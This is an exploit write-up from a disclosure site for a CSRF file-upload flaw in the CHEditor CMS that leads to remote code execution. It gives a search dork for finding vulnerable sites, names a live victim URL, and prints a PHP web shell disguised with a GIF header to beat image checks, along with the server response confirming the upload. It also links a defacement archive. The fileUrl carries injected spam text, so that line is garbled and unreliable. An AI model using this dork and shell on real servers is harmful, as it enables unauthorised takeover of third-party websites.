CHEditor CMS CSRF Vulnerability Leading to Shell Upload ( RCE ) + Bypass Image Validation

2021.02.14

Bloos3rpent (PH)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/cheditor/imageUpload/ "index of" intext:upload.php

[+] Dork: inurl:/cheditor/imageUpload/ "index of" intext:upload.php
[+] Send 'file' POST Request in http://sky2.kr/cheditor/imageUpload/upload.php
[+] Craft your own CSRF Payload or just use Online CSRF (https://www.funeralflowersphilippines.com.ph/csrf.php) 
[+] Credits to Alita for his/her Online CSRF
[+] Add Image Header in your file payload

[+] My Payload (xploit.php):

GIF8;
<?php echo '<pre>'.shell_exec($_GET['cmd']); ?>


[+] JSON Success response:

{"fileUrl": "http://sky2.krgeneric viagra no prescription/data/designImages//xploit.php.php", "filePath": "/home/bighitshop/www/data/designImages//xploit.php", "fileName": "imagehader.php", "fileSize": "54" }

[+] Destination Path: http://victim.com/data/designImages/your_exploit.php
[+] Live Demo: http://sky2.kr/cheditor/imageUpload/upload.php

[+] All Credits to Bloos3rpent
> https://www.facebook.com/GrayHatPhantom
> http://www.zone-h.org/archive/notifier=Bloos3rpent
> https://twitter.com/blooserpent


[+] Video POC:
> https://www.youtube.com/watch?v=4O2PeEDL_wg

See this note in RAW Version

Vote for this issue:

33%

67%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CHEditor CMS CSRF Vulnerability Leading to Shell Upload ( RCE ) + Bypass Image Validation

Dork: inurl:/cheditor/imageUpload/ "index of" intext:upload.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.